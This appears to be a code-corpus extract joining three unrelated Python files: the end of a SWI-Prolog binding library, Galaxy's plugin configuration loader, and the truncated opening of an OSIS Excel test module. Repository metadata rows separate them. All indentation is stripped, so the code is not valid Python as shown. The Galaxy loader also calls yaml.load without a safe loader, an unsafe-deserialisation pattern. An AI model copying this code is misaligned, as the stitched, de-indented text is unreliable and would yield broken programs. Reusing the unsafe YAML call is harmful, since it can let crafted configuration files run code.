return hash((self.get_name(), self.get_arity()))
def __call__(self, *args):
"""Returns a new compound term created from this functor and `args`.
The length of `args` must be the same as the arity of `functor`.
See `Term.from_cons_functor`.
"""
return Term.from_cons_functor(self, *args)
def get_name(self):
"""The functor's name as an `Atom` object."""
return Atom._from_handle(PL_functor_name(self._handle))
def get_arity(self):
"""The functor's arity as an integer."""
return PL_functor_arity(self._handle)
class Module(HandleWrapper, ConstantHandleToConstantMixIn):
"""Prolog Module Interface"""
def __init__(self, name):
"""Finds existing module or creates a new module with given name.
Args:
name (Atom): Name of the module.
"""
super().__init__(handle=PL_new_module(name._handle))
def __str__(self):
return str(self.get_name())
def __repr__(self):
return 'Module(name={name!r})'.format(name=self.get_name())
def __eq__(self, other):
if type(other) is not type(self):
return NotImplemented
return self.get_name() == other.get_name()
def __hash__(self):
return hash(self.get_name())
@classmethod
def current_context(cls):
"""Returns the current context module."""
return cls._from_handle(PL_context())
def get_name(self):
"""The name of the module as an `Atom` object."""
return Atom._from_handle(PL_module_name(self._handle))
class Predicate(HandleWrapper, ConstantHandleToConstantMixIn):
"""Prolog Predicate Interface"""
def __init__(self, functor, module=None):
"""Create a predicate from a functor.
Args:
functor (Functor): Functor used to create the predicate.
module (Module) : Module containing the functor.
If ``None``, uses the current context module.
"""
super().__init__(
handle=PL_pred(functor._handle, _get_nullable_handle(module)))
@classmethod
def from_name_arity(cls, name, arity, module_name=None):
"""Create a predicate directly from Python's built-in types.
Args:
name (str) : Name of functor used to create the predicate.
arity (int) : Arity of functor used to create the predicate.
module_name (str): Name of module containing the functor.
If ``None``, uses the current context module.
"""
return cls._from_handle(handle=PL_predicate(
name.encode(), arity,
module_name.encode() if module_name is not None else None))
def __str__(self):
info = self.get_info()
return '{module_prefix}{name}/{arity}'.format(
module_prefix=(str(info.module) + ':'
if info.module is not None else ''),
name=info.name,
arity=info.arity)
def __repr__(self):
info = self.get_info()
return 'Predicate(functor={functor!r}, module={module!r})'.format(
functor=Functor(name=info.name, arity=info.arity),
module=info.module)
def __eq__(self, other):
if type(other) is not type(self):
return NotImplemented
return self.get_info() == other.get_info()
def __hash__(self):
return hash(self.get_info())
def __call__(self, *arguments, arglist=None, goal_context_module=None,
check=False):
"""Call predicate with arguments.
Finds a binding for arguments that satisfies the predicate.
Like Query but only finds the first solution.
Args:
*arguments (Term) : Terms to pass as arguments to this
predicate.
arglist (TermList) : Arguments to this predicate.
Cannot pass both arguments and arglist.
goal_context_module (Module): Context module of the goal.
If ``None``, the current context module is used, or ``user`` if
there is no context. This only matters for meta_predicates.
check (bool) : Check that the call succeeded.
Returns:
bool: True if a binding for `arguments` was found.
Raises:
PrologException : If an exception was raised in Prolog.
PrologCallFailed: If the call failed and `check` is ``True``.
"""
if arglist is None:
arglist = TermList.from_terms(*arguments)
elif arguments:
raise ValueError('Cannot provide both "arguments" and "arglist".')
self.check_argument_match(arglist)
success = bool(PL_call_predicate(
_get_nullable_handle(goal_context_module),
PL_Q_NODEBUG | PL_Q_CATCH_EXCEPTION,
self._handle,
arglist._handle))
if check and not success:
raise PrologCallFailed(str(self))
return success
Info = namedtuple('Info', ['name', 'arity', 'module'])
def get_info(self):
"""Returns name, arity, and module of this predicate.
Returns:
Predicate.Info:
"""
name = atom_t()
arity = c_int()
module = module_t()
PL_predicate_info(self._handle,
byref(name), byref(arity), byref(module))
return self.Info(name=Atom._from_handle(name.value),
arity=arity.value,
module=Module._from_handle(module.value))
def check_argument_match(self, arguments):
"""Check that the right number of arguments are given.
Args:
arguments (TermList): List of arguments.
Raises:
ValueError : If the number of arguments does not match
the predicate's arity.
"""
number_of_arguments = len(arguments)
arity = self.get_info().arity
if number_of_arguments != arity:
raise ValueError(
('number of arguments ({nargs}) does not match '
'predicate arity ({arity})').format(
nargs=number_of_arguments,
arity=arity))
class Term(HandleWrapper):
"""Prolog Term Interface."""
_equality_predicate = Predicate.from_name_arity(name='==', arity=2)
_logical_or_functor = Functor(';', 2)
_logical_and_functor = Functor(',', 2)
def __init__(self):
"""Initialize a new term. The term is initially a variable."""
super().__init__(handle=PL_new_term_ref())
def __str__(self):
"""A Prolog string representing this term."""
return self.get_chars()
def __repr__(self):
return ('Term(handle={handle!r}, type={type!r}, value={value!r})'
.format(handle=self._handle, type=self.type(),
value=self.get_chars()))
def __eq__(self, other):
"""Check if two terms have the same value. Does not perform unification.
"""
try:
return self._equality_predicate(self, other)
except AttributeError as e:
if '_handle' not in str(e):
raise
return NotImplemented
def __or__(self, other):
"""Logical OR of two terms."""
return self._logical_or_functor(self, other)
def __and__(self, other):
"""Logical AND of two terms."""
return self._logical_and_functor(self, other)
def __int__(self):
"""Integer representation of this term (if it stores an integer)."""
return self.get_integer()
def __float__(self):
"""Float representation of this term (if it stores a float)."""
return self.get_float()
def __deepcopy__(self, memo):
"""Creates a new Prolog term, copied from the old."""
return self.from_term(self)
def type(self):
"""Term type as a string.
Returns one of the following strings:
* ``variable``
* ``atom``
* ``integer``
* ``float``
* ``string``
* ``term``
* ``nil``
* ``blob``
* ``list-pair``
* ``dict``
"""
type_code = PL_term_type(self._handle)
return _term_type_code_name[type_code]
def is_acyclic(self):
"""True if this is an acyclic term."""
return bool(PL_is_acyclic(self._handle))
def is_atom(self):
"""True if this term is an atom."""
return bool(PL_is_atom(self._handle))
def is_atomic(self):
"""True if this term is atomic.
A term is atomic if it is not variable or compound.
"""
return bool(PL_is_atomic(self._handle))
def is_callable(self):
"""True if this term is callable.
A term is callable if it is compound or an atom.
"""
return bool(PL_is_callable(self._handle))
def is_compound(self):
"""True if this term is compound.
A compound term is a functor with arguments.
"""
return bool(PL_is_compound(self._handle))
def is_float(self):
"""True if this term is a float."""
return bool(PL_is_float(self._handle))
def is_functor(self, functor):
"""True if this term is compound and its functor is `functor`.
Args:
functor (Functor): Check if this is the functor of `self`.
"""
return bool(PL_is_functor(self._handle, functor._handle))
def is_ground(self):
"""True if this term is a ground term.
A ground term is a term that holds no free variables.
"""
return bool(PL_is_ground(self._handle))
def is_integer(self):
"""True if this term is an integer."""
return bool(PL_is_integer(self._handle))
def is_list(self):
"""True if this term is a list.
A term is a list if it is:
* a compound term using the list constructor (`is_pair`); or
* the list terminator (`is_nil`).
Note:
This definition is weaker than what is used by the prolog predicate
``is_list``, which has the additional constraint that the 2nd term
in the list pair also be a list.
For example,
>>> Term.from_parsed('[1|2]').is_list()
True
>>> Term.from_parsed('is_list([1|2])')()
False
"""
return bool(PL_is_list(self._handle))
def is_nil(self):
"""True if this term is the list terminator.
The list terminator is the constant ``[]``.
"""
return bool(PL_get_nil(self._handle))
def is_number(self):
"""True if this term is an integer or float."""
return bool(PL_is_number(self._handle))
def is_pair(self):
"""True if this term is a compound term using the list constructor."""
return bool(PL_is_pair(self._handle))
def is_string(self):
"""True if this term is a string."""
return bool(PL_is_string(self._handle))
def is_variable(self):
"""True if this term is a variable."""
return bool(PL_is_variable(self._handle))
@staticmethod
def _require_success(return_code):
assert bool(return_code)
@staticmethod
def _require_success_expecting_type(return_code, *required_types):
assert required_types
if not bool(return_code):
if len(required_types) == 1:
type_str = required_types[0]
elif len(required_types) == 2:
type_str = '{} or {}'.format(*required_types)
else:
type_str = '{}, or {}'.format(
', '.join(required_types[:-1],),
required_types[-1])
raise TypeError('Term is not {a} {type}.'.format(
a=('an' if type_str[0].lower() in 'aeiou' else 'a'),
type=type_str))
def get_atom(self):
"""An `Atom` object representing this term, if it is a prolog atom."""
a = atom_t()
self._require_success_expecting_type(
PL_get_atom(self._handle, byref(a)),
'atom')
return Atom._from_handle(a.value)
def get_atom_name(self):
"""The value of this term as a string, if it is a prolog atom."""
s = POINTER(c_char)()
length = c_size_t()
self._require_success_expecting_type(
PL_get_atom_nchars(self._handle, byref(length), byref(s)),
'atom')
return _decode_ptr_len_string(s, length)
def get_string_chars(self):
"""The value of this term as a string, if it is a prolog string."""
s = POINTER(c_char)()
length = c_size_t()
self._require_success_expecting_type(
PL_get_string_chars(self._handle, byref(s), byref(length)),
'string')
return _decode_ptr_len_string(s, length)
def get_chars(self):
"""Representation of this term as a string in Prolog syntax."""
s = POINTER(c_char)()
length = c_size_t()
self._require_success(
PL_get_nchars(self._handle,
byref(length),
byref(s),
CVT_WRITEQ | BUF_DISCARDABLE | REP_UTF8))
return _decode_ptr_len_string(s, length, encoding='utf8')
def get_integer(self):
"""The value of this term as an integer, if it is an integer or
compatible float.
"""
i = c_int64()
self._require_success_expecting_type(
PL_get_int64(self._handle, byref(i)),
'integer', 'int-compatible float')
return i.value
def get_bool(self):
"""The value of this term as a boolean, if it is `true` or `false`."""
i = c_int()
self._require_success_expecting_type(
PL_get_bool(self._handle, byref(i)),
'boolean')
return bool(i.value)
def get_pointer(self):
"""The value of this term as an integer address, if it is a pointer."""
p = c_void_p()
self._require_success_expecting_type(
PL_get_pointer(self._handle, byref(p)),
'pointer')
return p.value
def get_float(self):
"""The value of this term as a float, if it is an integer or float."""
f = c_double()
self._require_success_expecting_type(
PL_get_float(self._handle, byref(f)),
'float', 'integer')
return f.value
def get_functor(self):
"""A `Functor` object representing this term, if it is a compound term
or atom."""
functor = functor_t()
self._require_success_expecting_type(
PL_get_functor(self._handle, byref(functor)),
'compound term', 'atom')
return Functor._from_handle(functor.value)
NameArity = namedtuple('NameArity', ['name', 'arity'])
def get_name_arity(self):
"""The name and arity of this term, if it is a compound term or an atom.
Compound terms with arity 0 give the same result as an atom.
To distinguish them use `is_compound` and/or `get_compound_name_arity`.
Returns:
NameArity: namedtuple (name, arity)
"""
name = atom_t()
arity = c_int()
self._require_success_expecting_type(
PL_get_name_arity(self._handle, byref(name), byref(arity)),
'compound term', 'atom')
return self.NameArity(name=Atom._from_handle(name.value),
arity=arity.value)
def get_compound_name_arity(self):
"""The name and arity of this term, if it is a compound term.
The same as `get_name_arity` but fails for atoms.
Returns:
NameArity: Named tuple of name (`string`) and arity (`int`).
"""
name = atom_t()
arity = c_int()
self._require_success_expecting_type(
PL_get_compound_name_arity(self._handle, byref(name),
byref(arity)),
'compound term')
return self.NameArity(name=Atom._from_handle(name.value),
arity=arity.value)
def get_module(self):
"""A `Module` object corresponding to this term, if it is an atom."""
module = module_t()
self._require_success_expecting_type(
PL_get_module(self._handle, byref(module)),
'atom')
return Module._from_handle(module.value)
def get_arg(self, index):
"""A new term with a reference to an argument of this term.
Args:
index (int): Index of the argument.
Index is 0-based, unlike in Prolog.
Returns:
Term: A new term reference to the argument.
Raises:
AssertionError: If `index` is out of bounds or
if this term is not compound.
Note: This returns a _new_ term, not a the argument term itself.
Therefore, using `put_*` methods on the return value will not
change the argument itself, while unification will.
"""
t = Term()
self._require_success(
PL_get_arg(index + 1, self._handle, t._handle))
return t
HeadTail = namedtuple('HeadTail', ['head', 'tail'])
def get_list_head_tail(self):
"""Get the head and tail of the list represented by this term.
Returns:
HeadTail: Named tuple of head and tail, both `Term` objects.
"""
head = Term()
tail = Term()
self._require_success_expecting_type(
PL_get_list(self._handle, head._handle, tail._handle),
'list')
return self.HeadTail(head=head, tail=tail)
def get_list_head(self):
"""The head of the list represented by this term.
Returns:
Term:
"""
head = Term()
self._require_success_expecting_type(
PL_get_head(self._handle, head._handle),
'list')
return head
def get_list_tail(self):
"""The tail of the list represented by this term.
Returns:
Term:
"""
tail = Term()
self._require_success_expecting_type(
PL_get_tail(self._handle, tail._handle),
'list')
return tail
def get_nil(self):
"""Succeeds if this term represents the list termination constant (nil).
Raises:
AssertionError: If this term does not represent nil.
"""
self._require_success(
PL_get_nil(self._handle))
def put_variable(self):
"""Put a fresh variable in this term, resetting it to its initial state.
"""
PL_put_variable(self._handle)
def put_atom(self, atom):
"""Put an atom in this term.
Args:
atom (Atom): Atom to put in this term.
"""
PL_put_atom(self._handle, atom._handle)
def put_bool(self, val):
"""Put a boolean in this term.
Puts either the atom ``true`` or the atom ``false``.
"""
PL_put_bool(self._handle, int(bool(val)))
def put_atom_name(self, atom_name):
"""Put an atom in this term, constructed from a string name.
Args:
atom_name (str): Name of the atom to put in this term.
"""
encoded_atom_name = atom_name.encode()
PL_put_atom_nchars(self._handle,
len(encoded_atom_name),
encoded_atom_name)
def put_string(self, string):
"""Put a string in the term."""
encoded_string = string.encode()
self._require_success(
PL_put_string_nchars(self._handle,
len(encoded_string),
encoded_string))
def put_list_chars(self, bytes_):
"""Put a byte string in the term as a list of characters."""
self._require_success(
PL_put_list_nchars(self._handle, len(bytes_), bytes_))
def put_integer(self, val):
"""Put an integer in the term."""
self._require_success(
PL_put_int64(self._handle, val))
def put_pointer(self, address):
"""Put an integer address in the term."""
self._require_success(
PL_put_pointer(self._handle, address))
def put_float(self, val):
"""Put a floating-point value in the term."""
self._require_success(
PL_put_float(self._handle, val))
def put_functor(self, functor):
"""Put a compound term created from a functor in this term.
The arguments of the compound term are __TEMPORARY__ variables.
To create a term with instantiated arguments or with persistent
variables, use `put_cons_functor`.
Warning:
The arguments of the returned compound term are not persistent.
References to the arguments (e.g. using `get_arg`) may be
invalidated by the prolog system after other API calls.
Either use `put_cons_functor` or get a new reference to the
arguments each time they are needed.
"""
self._require_success(
PL_put_functor(self._handle, functor._handle))
def put_list(self):
"""Put a list pair in this term, whose head and tail are variables.
Like `put_functor` but using the ``[|]`` functor.
"""
self._require_success(
PL_put_list(self._handle))
def put_nil(self):
"""Put the list terminator constant in this term."""
self._require_success(
PL_put_nil(self._handle))
def put_term(self, term):
"""Set this term to reference the new term."""
PL_put_term(self._handle, term._handle)
@classmethod
def from_term(cls, term):
"""Create a new term as a copy of an existing one."""
return cls._from_handle(handle=PL_copy_term_ref(term._handle))
def put_parsed(self, string):
"""Parse `string` as Prolog and place the result in this term.
Args:
string (str): A term string in Prolog syntax.
Optionally ends with a full-stop (.)
Raises:
PrologException: If the parse fails.
The exception is also stored in this term.
"""
success = PL_chars_to_term(string.encode(), self._handle)
if not success:
raise PrologException(self)
def put_cons_functor(self, functor, *args):
"""Set this term to a compound term created from `functor` and `args`.
The length of `args` must be the same as the arity of `functor`.
"""
functor_arity = functor.get_arity()
if functor_arity != len(args):
raise TypeError(
('Functor arity ({arity}) does not match '
'number of arguments ({nargs}).').format(
arity=functor_arity, nargs=len(args)))
if not all(isinstance(arg, Term) for arg in args):
raise TypeError(
'All arguments after `functor` must be `Term` objects.')
if len(args) > 4:
# PL_cons_functor segfaults when passed > 4 arguments
return self.put_cons_functor_v(functor, TermList.from_terms(*args))
self._require_success(
PL_cons_functor(self._handle, functor._handle,
*[arg._handle for arg in args]))
def put_cons_functor_v(self, functor, args):
"""Set this term to a compound term created from `functor` and args.
Args:
functor (Functor): Functor used to create the compound term.
args (TermList) : A term list of arguments.
"""
self._require_success(
PL_cons_functor_v(self._handle,
functor._handle,
args._handle))
def put_cons_list(self, head, tail):
"""Set this term to a list constructed from head and tail."""
self._require_success(
PL_cons_list(self._handle, head._handle, tail._handle))
def put_list_terms(self, terms):
"""Set this term to a list constructed from a list of terms.
Args:
terms (list): A (python) list of terms.
"""
try:
head = terms.pop(0)
except IndexError:
self.put_nil()
return
tail = Term.from_nil()
while terms:
tail = Term.from_cons_list(terms.pop(), tail)
self.put_cons_list(head, tail)
def __call__(self, context_module=None, check=False):
"""Call term like once(term).
Attempts to find an assignment of the variables in the term that
makes the term true.
Args:
context_module (Module): Context module of the goal.
check (bool) : Check that the call succeeded.
Returns:
bool: True if the call succeeded.
Raises:
PrologCallFailed: If the call failed and `check` is ``True``.
"""
success = bool(PL_call(self._handle,
_get_nullable_handle(context_module)))
if check and not success:
raise PrologCallFailed(str(self))
return success
def unify(self, term):
"""Unify with a term.
Functionally equivalent to:
`Predicate.from_name_arity('=', 2)(self, term)`
Returns:
bool: True if the unification was successful
Even if this returns false, the unification may have partially
completed and variables will remain bound. Use with `Frame` to
completely undo bindings in the event of failure.
"""
return bool(PL_unify(self._handle, term._handle))
def unify_atom(self, atom):
"""Unify with an atom.
Returns:
bool: True on success.
"""
return bool(PL_unify_atom(self._handle, atom._handle))
def unify_bool(self, val):
"""Unify with a boolean.
Returns:
bool: True on success.
"""
return bool(PL_unify_bool(self._handle, int(bool(val))))
def unify_atom_name(self, atom_name):
"""Unify with an atom given by its name.
Returns:
bool: True on success.
"""
encoded_atom_name = atom_name.encode()
return bool(PL_unify_atom_nchars(self._handle,
len(encoded_atom_name),
encoded_atom_name))
def unify_list_chars(self, bytes_):
"""Unify with a list of bytes.
Returns:
bool: True on success.
"""
return bool(PL_unify_list_nchars(self._handle, len(bytes_), bytes_))
def unify_string(self, string):
"""Unify with a string.
Returns:
bool: True on success.
"""
encoded_string = string.encode()
return bool(PL_unify_string_nchars(self._handle,
len(encoded_string),
encoded_string))
def unify_integer(self, val):
"""Unify with an integer.
Returns:
bool: True on success.
"""
return bool(PL_unify_int64(self._handle, val))
def unify_float(self, val):
"""Unify with a floating-point value.
Returns:
bool: True on success.
"""
return bool(PL_unify_float(self._handle, val))
def unify_pointer(self, address):
"""Unify with an integer address.
Returns:
bool: True on success.
"""
return bool(PL_unify_pointer(self._handle, address))
def unify_functor(self, functor):
"""Unify with a functor.
Unifies the functor, not any arguments.
If functor has arity 0, unifies with an atom.
Identical to `Term.unify_compound` except for arity-0 functors.
Returns:
bool: True on success.
"""
return bool(PL_unify_functor(self._handle, functor))
def unify_compound(self, functor):
"""Unify with a compound functor.
Unifies the functor, not any arguments.
If functor has arity 0, unifies with an arity-0 compound term.
Identical to `Term.unify_compound` except for arity-0 functors.
Returns:
bool: True on success.
"""
return bool(PL_unify_compound(self._handle, functor))
def unify_list(self, head, tail):
"""Unify with a list cell [head | tail] for terms head, tail.
Returns:
bool: True on success.
"""
return bool(PL_unify_list(self._handle, head._handle, tail._handle))
def unify_nil(self):
"""Unify with the list terminator constant.
Returns:
bool: True on success.
"""
return bool(PL_unify_nil(self._handle))
def unify_arg(self, index, arg):
"""Unify the index-th argument of a compound term with term `arg`.
Indexing is 0-based.
Returns:
bool: True on success.
"""
return bool(PL_unify_arg(index + 1, self._handle, arg._handle))
def _add_from_method_to_class(klass, put_method_name, put_method):
suffix = put_method_name[4:]
from_method_name = 'from_' + suffix
if hasattr(klass, from_method_name):
raise AttributeError('{} method already exists.'.format(
from_method_name))
def from_method(cls, *args, **kwargs):
new_term = cls()
put_method(new_term, *args, **kwargs)
return new_term
from_method.__name__ = from_method_name
from_method.__qualname__ = str(klass.__name__) + '.' + from_method_name
from_method.__doc__ = 'A new Term initialized using `{}`'.format(
put_method_name)
setattr(klass, from_method_name, classmethod(from_method))
# Generate a from_<type> method for each put_<type> method.
for put_method_name in dir(Term):
if not put_method_name.startswith('put_'):
continue
put_method = getattr(Term, put_method_name)
if not callable(put_method):
continue
try:
_add_from_method_to_class(Term, put_method_name, put_method)
except AttributeError as e:
if 'already exists' in str(e):
# Don't add if from_ already exists.
pass
else:
raise
class TemporaryTerm(Term, TemporaryHandleMixIn):
pass
class TermList(HandleWrapper):
"""A collection of term references.
Required by `Term.cons_functor_v` and `Query`.
"""
def __init__(self, length):
self._length = length
super().__init__(handle=PL_new_term_refs(length))
@classmethod
def from_terms(cls, *terms):
termlist = cls(len(terms))
for i, term in enumerate(terms):
termlist[i].put_term(term)
return termlist
def __eq__(self, other):
try:
return super().__eq__(other) and self._length == other._length
except AttributeError as e:
if '_handle' not in str(e):
raise
return NotImplemented
def __str__(self):
return str(list(self))
def __repr__(self):
return 'TermList(handle={handle!r}, length={length!r})'.format(
handle=self._handle,
length=self._length)
def __len__(self):
return self._length
def __getitem__(self, key):
if isinstance(key, int) and key >= 0 and key < self._length:
return Term._from_handle(self._handle + key)
else:
raise IndexError()
class Query():
"""Prolog Query Context Manager."""
_call_predicate = Predicate.from_name_arity('call', 1)
def __init__(self, predicate, *arguments, arglist=None,
goal_context_module=None):
"""Prepare a query.
A query consists of a predicate (`predicate`) and a list of arguments
(`arguments`). Each solution is an assignment to variables in
`arguments` that satisfies the predicate.
A query behaves statefully. The solutions must be read from
`arguments`.
Args:
predicate (Predicate) : Predicate to query.
*arguments (Term) : Terms to pass as arguments to
`predicate`.
arglist (TermList) : List of argument terms to
`predicate`. Cannot pass both arguments and arglist.
goal_context_module (Module): Context module of the goal.
If ``None``, the current context module is used, or ``user`` if
there is no context. This only matters for meta_predicates.
Note
----
Only one query can be active at a time, but the query is not activated
until `__enter__` is called.
"""
if arglist is None:
arglist = TermList.from_terms(*arguments)
elif arguments:
raise ValueError('Cannot provide both "arguments" and "arglist".')
predicate.check_argument_match(arglist)
self.predicate = predicate
self.arglist = arglist
self.goal_context_module = goal_context_module
self.active_query = None
@classmethod
def call_term(cls, term, goal_context_module=None):
"""Prepare a query that will call a single term.
Args:
term (Term) : Term to call.
goal_context_module (Module): Context module of the goal.
If ``None``, the current context module is used, or ``user`` if
there is no context. This only matters for meta_predicates.
See `Query.__init__` for more. Equivalent to:
``Query(Predicate.from_name_arity('call', 1), term)``
"""
return cls(Query._call_predicate, term,
goal_context_module=goal_context_module)
def __str__(self):
return '{pred}({args})'.format(
pred=str(self.predicate).rsplit('/', 1)[0],
args=', '.join(str(arg) for arg in self.arglist))
def __repr__(self):
return ('Query(predicate={predicate!r}, arglist={arglist!r}, '
'goal_context_module={goal_context_module!r})').format(
predicate=self.predicate,
arglist=self.arglist,
goal_context_module=self.goal_context_module)
def __enter__(self):
self.active_query = _ActiveQuery(self)
return self.active_query
def __exit__(self, type, value, traceback):
self.active_query.close()
def term_assignments(self, term, persistent):
"""The value of a term under each solution to the query.
Iterates over all remaining solutions to the query and, for each
solution, yields the current value of `term`.
Args:
term (Term): The term whose assignments to return.
persistent (bool): If True, `TermRecord` objects will be yielded
instead of `TemporaryTerm` so that their value persists
across solutions.
Yields:
Either `TemporaryTerm` or a `TermRecord` representing the
value of `term` under a particular solution.
If `persistent` is ``False``, then `TemporaryTerm` values are
yielded, which are invalidated on the next call to `next_solution`.
"""
if persistent:
yield from self._term_assignments_persistent(term)
else:
yield from self._term_assignments_temporary(term)
def _term_assignments_persistent(self, term):
with self as active_query:
while active_query.next_solution():
yield TermRecord(term)
def _term_assignments_temporary(self, term):
with self as active_query:
while active_query.next_solution():
temporary_term = TemporaryTerm.from_term(term)
active_query.bind_temporary_term(temporary_term)
yield temporary_term
class _ActiveQuery(HandleWrapper, TemporaryHandleMixIn):
"""Interface to an active Prolog Query.
Only one query can be active at a time.
"""
def __init__(self, query):
"""Create an active query. See `Query`
Args:
query (Query) : Query to activate.
"""
self._query = query
super().__init__(handle=PL_open_query(
_get_nullable_handle(query.goal_context_module),
PL_Q_NODEBUG | PL_Q_CATCH_EXCEPTION,
query.predicate._handle,
query.arglist._handle))
self._bound_temporary_terms = []
def next_solution(self):
"""Find the next solution, updating `arglist`.
Returns:
bool: ``True`` if a solution was found, otherwise returns
``False``.
Raises:
PrologException: If an exception was raised in Prolog.
Warning
-------
Calling `next_solution` results in backtracking.
All variable bindings and newly-created terms since the last call
will be undone.
Use `TermRecord` to persist terms across backtracks.
"""
success = bool(PL_next_solution(self._handle))
self._invalidate_bound_temporary_terms()
if not success:
exception_term = PL_exception(self._handle)
if exception_term:
raise PrologException(Term._from_handle(exception_term))
return success
def bind_temporary_term(self, term):
"""Bind a temporary term to the current solution state of this query.
The term will be invalidated on the next call to `next_solution`.
Args:
term (TemporaryTerm): Temporary term to bind.
"""
self._bound_temporary_terms.append(term)
def _invalidate_bound_temporary_terms(self):
for term in self._bound_temporary_terms:
term._invalidate()
self._bound_temporary_terms = []
def close(self):
"""Close the query and destroy all data and bindings associated with it.
"""
PL_close_query(self._handle)
self._invalidate()
def __str__(self):
return str(self._query)
def __repr__(self):
return ('_ActiveQuery(query={query!r}, _handle={handle!r})'.format(
query=self._query, _handle=self._handle))
def _get_nullable_handle(handle_wrapper):
"""Return the handle of `handle_wrapper` or None"""
if handle_wrapper is None:
return None
else:
return handle_wrapper._handle
class TermRecord(HandleWrapper):
"""Records a Prolog Term so that it can be retrieved later.
This persists across backtracks, unlike `Term` itself.
"""
def __init__(self, term):
"""Create a term record.
Args:
term (Term): Term to record.
"""
super().__init__(PL_record(term._handle))
def get(self):
"""Get the term that was stored in this object.
Returns:
Term: A copy of the stored term.
"""
t = Term()
success = PL_recorded(self._handle, t._handle)
if not success:
raise PrologMemoryError()
return t
def __del__(self):
PL_erase(self._handle)
class Frame(HandleWrapper, TemporaryHandleMixIn):
"""A prolog frame context.
All term references (and optionally, data modifications) created within the
frame are discarded at the close of the frame.
With close(), used to create temporary term refences.
With discard(), used to undo unifications and other data modifications.
It is best to use the frame in a python context. i.e.:
>>> X = Term()
>>> eq = Predicate.from_name_arity('=', 2)
>>> with Frame() as frame:
... for i in range(3):
... t = frame.term()
... t.put_integer(i)
... eq(X, t) and None
... print(X)
... frame.rewind()
0
1
2
Warning:
Term objects created using the `Term` class constructors after the
frame is opened will produce undefined behaviour (likely segfault) if
used after the frame is closed, discarded, or rewound. Instead, use
the `term()` method to get `Term` objects with proper error handling.
Warning:
While the SWI-Prolog documentation doesn't specifically warn against
it, it is probably a bad idea to open and close multiple frames in
anything other than stack order.
Note:
Frames have no effect on the prolog dynamic database (assertz).
"""
def __init__(self, discard=False):
"""Open the frame.
Args:
discard (bool): If true, __exit__ calls discard() instead of
close().
"""
super().__init__(handle=PL_open_foreign_frame())
self.discard_on_exit = discard
self._associated_terms = []
def close(self):
"""Close the frame.
Discard all term references created since the frame was opened,
retaining all other prolog data.
"""
self._invalidate_associated_terms()
PL_close_foreign_frame(self._handle)
self._invalidate()
def discard(self):
"""Discard the frame.
Discard all term references, bindings, and prolog data created since
the frame was opened.
"""
self._invalidate_associated_terms()
PL_discard_foreign_frame(self._handle)
self._invalidate()
def rewind(self):
"""Rewind the frame.
Undo all bindings and discard all term references created since the
frame was opened. Does not pop the frame.
"""
self._invalidate_associated_terms()
PL_rewind_foreign_frame(self._handle)
def term(self):
"""Safely create Term objects within this frame.
The returned terms will be invalidated _in Python_ when this frame is
closed, discarded, or rewound.
Term objects created within the frame using the `Term` class will by
invalidated in Prolog at the end of the frame, but _not_ in Python.
As a result, continuing to use those objects will produce undefined
behaviour, likely a segfault.
Conversely, the `TemporaryTerm` objects returned by this method will
produce a catachable Python exception if used after invalidation,
rather than immediately terminating the program with a segfault.
"""
term = TemporaryTerm()
self._associated_terms.append(term)
return term
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
if self.discard_on_exit:
self.discard()
else:
self.close()
def _invalidate_associated_terms(self):
for term in self._associated_terms:
term._invalidate()
self._associated_terms = []
| mit | -278,160,444,804,315,000 | 30.287293 | 80 | 0.567858 | false |
mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/lib/galaxy/util/plugin_config.py | 1 | 2386 | from xml.etree import ElementTree
try:
from galaxy import eggs
eggs.require('PyYAML')
except Exception:
# If not in Galaxy, ignore this.
pass
try:
import yaml
except ImportError:
yaml = None
from galaxy.util.submodules import submodules
def plugins_dict(module, plugin_type_identifier):
""" Walk through all classes in submodules of module and find ones labelled
with specified plugin_type_identifier and throw in a dictionary to allow
constructions from plugins by these types later on.
"""
plugin_dict = {}
for plugin_module in submodules( module ):
# FIXME: this is not how one is suppose to use __all__ why did you do
# this past John?
for clazz in plugin_module.__all__:
plugin_type = getattr( clazz, plugin_type_identifier, None )
if plugin_type:
plugin_dict[ plugin_type ] = clazz
return plugin_dict
def load_plugins(plugins_dict, plugin_source, extra_kwds={}):
source_type, source = plugin_source
if source_type == "xml":
return __load_plugins_from_element(plugins_dict, source, extra_kwds)
else:
return __load_plugins_from_dicts(plugins_dict, source, extra_kwds)
def __load_plugins_from_element(plugins_dict, plugins_element, extra_kwds):
plugins = []
for plugin_element in plugins_element.getchildren():
plugin_type = plugin_element.tag
plugin_kwds = dict( plugin_element.items() )
plugin_kwds.update( extra_kwds )
plugin = plugins_dict[ plugin_type ]( **plugin_kwds )
plugins.append( plugin )
return plugins
def __load_plugins_from_dicts(plugins_dict, configs, extra_kwds):
plugins = []
for config in configs:
plugin_type = config[ "type" ]
plugin_kwds = config
plugin_kwds.update( extra_kwds )
plugin = plugins_dict[ plugin_type ]( **plugin_kwds )
plugins.append( plugin )
return plugins
def plugin_source_from_path(path):
if path.endswith(".yaml") or path.endswith(".yml"):
return ('dict', __read_yaml(path))
else:
return ('xml', ElementTree.parse( path ).getroot())
def __read_yaml(path):
if yaml is None:
raise ImportError("Attempting to read YAML configuration file - but PyYAML dependency unavailable.")
with open(path, "rb") as f:
return yaml.load(f)
| gpl-3.0 | -1,747,664,163,855,154,200 | 28.45679 | 108 | 0.650042 | false |
uclouvain/OSIS-Louvain | program_management/tests/business/test_excel.py | 1 | 6599 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2019 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django.test import TestCase
from django.utils.translation import gettext_lazy as _
from base.models.enums.prerequisite_operator import AND, OR
from base.tests.factories.education_group_year import EducationGroupYearFactory
from base.tests.factories.group_element_year import GroupElementYearChildLeafFactory, GroupElementYearFactory
from base.tests.factories.prerequisite import PrerequisiteFactory
from program_management.business.excel import EducationGroupYearLearningUnitsPrerequisitesToExcel, \
